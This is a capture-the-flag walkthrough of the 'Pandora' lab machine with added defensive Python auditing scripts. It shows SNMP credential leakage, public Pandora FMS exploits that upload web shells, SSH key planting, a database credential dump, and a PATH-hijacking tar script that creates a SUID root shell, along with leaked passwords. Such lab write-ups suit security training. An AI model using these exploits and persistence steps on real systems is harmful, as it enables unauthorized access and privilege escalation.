Pandora
Recon
HTTP (80)

The website only serves static HTML files and the form posts back to the HTML page itself, so most probably there is nothing exploitable on this domain.
Subdomain enumeration comes up empty-handed too:
└─$ domain='panda.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 908
SSH is almost never vulnerable, HTTP has nothing, no subdomains or hidden paths 🤔 Feels like TCP doesn't have any vulnerabilities. Let's try a UDP scan before moving on.
SNMP
└─$ sudo nmap -n -sU -F --max-retries 1 --open panda.htb
PORT STATE SERVICE
161/udp open snmp
SNMP is open -> https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
Setup for better enumeration:
└─$ sudo apt-get install snmp-mibs-downloader -y
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
Start enum:
└─$ snmpbulkwalk -c public -v2c 10.129.71.80 . | tee snmp.log
...
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1038 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1039 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
...
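The walk above leaks a password because host_check is started with its credentials on the command line, and hrSWRunParameters hands every process's argv to anyone who knows the read community string. The following Python is an added example, not part of the original write-up: it parses snmpbulkwalk output in the shape shown above (a constructed sample embedded inline, built from the lines on this page) and flags arguments that look like secrets, while skipping the overloaded -p of snmpd's pidfile and agetty's "-p --". The regexes and function names are my own.

```python
import re

# Constructed sample in the shape of the snmpbulkwalk output above; the PIDs
# and argument strings are the ones that appear in the walk on this page.
SAMPLE_WALK = r'''HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
'''

# One walk line: hrSWRunParameters.<pid> = STRING: "<argv>"   (or = "" when empty)
LINE_RE = re.compile(r'hrSWRunParameters\.(\d+) = (?:STRING: )?"(.*)"\s*$')

# Option names commonly used to pass a password on the command line. The value
# stops at whitespace or a quote; glued forms like -pSecret are not handled.
CRED_RE = re.compile(r'(?:^|\s)(-p|-P|--password|--pass|--pw)(?:=|\s+)([^\s\'"]+)')


def find_leaked_credentials(walk_text):
    """Return (pid, option, value) for process arguments that look like secrets."""
    hits = []
    for line in walk_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        pid, argv = int(m.group(1)), m.group(2)
        for option, value in CRED_RE.findall(argv):
            # -p is overloaded: snmpd's pidfile path and agetty's "-p --" both
            # appear in this walk. A path or another option is not a secret.
            if value.startswith(("/", "-")):
                continue
            hits.append((pid, option, value))
    return hits


def redact(walk_text):
    """The same walk with detected secret values masked, for safe inclusion in a report."""
    for _, _, value in find_leaked_credentials(walk_text):
        walk_text = walk_text.replace(value, "[REDACTED]")
    return walk_text


if __name__ == "__main__":
    for pid, option, value in find_leaked_credentials(SAMPLE_WALK):
        print(f"pid {pid}: {option} {value!r} looks like a credential in argv")
```

On a real host, feed the saved snmp.log to find_leaked_credentials. The fix on the monitored side is to pass secrets through a config file or the environment rather than argv (argv is readable through /proc by local users regardless of SNMP); on the snmpd side, restrict the view exposed to the public community or drop the community entirely.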
SSH (daniel)
└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
Port forward the application
└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb -L 8000:0:80
From the frontend we see the version is v7.0NG.742_FIX_PERL2020; it can also be found in config_process.php:
daniel@pandora:/var/www/pandora/pandora_console$ cat ./include/config_process.php | grep _version
$build_version = 'PC200103';
$pandora_version = 'v7.0NG.742_FIX_PERL2020';
SSH (matt)
└─$ git clone -q https://github.com/UNICORDev/exploit-CVE-2020-5844.git
└─$ py exploit-CVE-2020-5844/exploit-CVE-2020-5844.py -t 127.0.0.1 8000 -u daniel HotelBabylon23
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: daniel
PASSWORD: HotelBabylon23
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:8000/pandora_console
PHPSESS: dee7h37beh357356o48mem3d4m
ERRORED: Invalid credentials!
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
└─$ curl http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
The CVE exploit failed. We also can't read config.php, since only matt can read it:
daniel@pandora:/var/www/pandora/pandora_console$ ls -alh ./include/config.php
-rw------- 1 matt matt 413 Dec 3 2021 ./include/config.php
Pandora_v7.0NG.742_exploit_unauthenticated -> Pandora FMS 742: Critical Code Vulnerabilities Explained
└─$ git clone -q https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
└─$ py Pandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py -t 127.0.0.1:8000
URL: http://127.0.0.1:8000/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : nudijm8drqtrr94j5qkf6nuv5r
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8000/pandora_console/images/pwn.php?test=
CMD > id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
---
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken
---
CMD > ls /home/matt -alh
total 24K
drwxr-xr-x 2 matt matt 4.0K Dec 7 2021 .
drwxr-xr-x 4 root root 4.0K Dec 7 2021 ..
lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 matt matt 3.7K Feb 25 2020 .bashrc
-rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile
-rw-r----- 1 root matt 33 Dec 11 19:02 user.txt
CMD > mkdir /home/matt/.ssh
CMD > echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' > /home/matt/.ssh/authorized_keys
└─$ ssh -i id_rsa matt@panda.htb
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
User.txt
matt@pandora:~$ cat user.txt
c3ad8efa5ad16bc60cec796cb0650520
Privilege Escalation
matt@pandora:/var/www/pandora/pandora_console/include$ cat config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| information_schema |
| pandora |
+--------------------+
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SHOW TABLES;'
| tpassword_history |
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SELECT * FROM tpassword_history;'
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password | date_begin | date_end |
+---------+---------+----------------------------------+---------------------+---------------------+
| 1 | matt | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
| 2 | daniel | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+

No sudo for us, but we have SUID binaries:
matt@pandora:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pandora_backup
...
└─$ scp -i id_rsa matt@panda.htb:/usr/bin/pandora_backup .
└─$ file pandora_backup
pandora_backup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
└─$ strings pandora_backup | grep -vE '^[._;]|GLIBC'
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
libc.so.6
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
backup.c
main
The binary calls tar by a relative path instead of an absolute one, so the command is resolved through our $PATH and we can hijack tar to be anything we want.
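Spotting this class of bug without running the binary: the following Python is an added example (not part of the original write-up or of Pandora FMS) that does what the strings pass above does by hand. It pulls printable strings out of an ELF and reports the combination that makes a SUID binary PATH-hijackable: a uid-changing call (setreuid), a PATH-resolving or shell-spawning call (system), and a command string whose first word has no slash. The sample bytes are constructed inline from the strings shown above, not the real binary; the function names and heuristics are my own. The same check on the hardened form, an absolute /usr/bin/tar, comes back clean.

```python
import re

# PATH-resolving / shell-spawning libc functions and uid-changing functions;
# a SUID binary that imports one from each group deserves a close look.
PATH_RESOLVING_CALLS = {"system", "popen", "execvp", "execlp", "execvpe"}
PRIVILEGE_CALLS = {"setuid", "seteuid", "setreuid", "setresuid"}

# Constructed stand-in for the ELF: the strings from the strings(1) output
# above, NUL-separated, behind a minimal ELF magic. Not the real binary.
SAMPLE_BINARY = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"\x00".join([
    b"puts", b"setreuid", b"system", b"getuid", b"geteuid", b"libc.so.6",
    b"PandoraFMS Backup Utility",
    b"Now attempting to backup PandoraFMS client",
    b"tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*",
    b"Backup failed!", b"Check your permissions!", b"Backup successful!",
]) + b"\x00"


def extract_strings(blob, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_relative_commands(strs):
    """Strings that look like a shell command whose program name has no '/'.

    A bare program name is looked up through $PATH at run time, and the caller
    controls $PATH. Heuristic: a lowercase first word without a slash, followed
    by at least one option (-x) or absolute-path argument."""
    found = []
    for s in strs:
        tokens = s.split()
        if len(tokens) < 2 or "/" in tokens[0]:
            continue
        if not re.fullmatch(r"[a-z][a-z0-9._-]*", tokens[0]):
            continue
        if any(t.startswith(("-", "/")) for t in tokens[1:]):
            found.append(s)
    return found


def audit(blob):
    """Summarise the three signals for one binary image."""
    strs = extract_strings(blob)
    present = set(strs)
    return {
        "privilege_calls": sorted(PRIVILEGE_CALLS & present),
        "path_resolving_calls": sorted(PATH_RESOLVING_CALLS & present),
        "relative_commands": find_relative_commands(strs),
    }


def is_path_hijackable(report):
    """True when a PATH-resolving call and a bare command name coexist."""
    return bool(report["path_resolving_calls"] and report["relative_commands"])


def audit_file(path):
    """Same audit over a file on disk, e.g. a SUID binary found with find -perm -4000."""
    with open(path, "rb") as f:
        return audit(f.read())


if __name__ == "__main__":
    report = audit(SAMPLE_BINARY)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("PATH hijack risk:", is_path_hijackable(report))
```

An absolute path removes the $PATH lookup but is not the whole fix: a SUID program that reaches system() still inherits the caller's environment and a shell. The robust shape is to drop the setuid bit entirely and run the backup from root's cron, or at least to execve a fixed argv with a sanitised environment.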
matt@pandora:/tmp$ nano tar
matt@pandora:/tmp$ cat tar
#!/bin/bash
mkdir /root/.ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' >> /root/.ssh/authorized_keys
install -m4777 /bin/bash /tmp/rootbash
SSH as root doesn't work because there's a deny rule:
matt@pandora:/tmp$ cat /etc/ssh/sshd_config | grep Deny
DenyUsers root
Root.txt
matt@pandora:/tmp$ /tmp/rootbash -p
rootbash-5.0# cat /root/root.txt
3b7410b14d3d60daf56dc908f89798de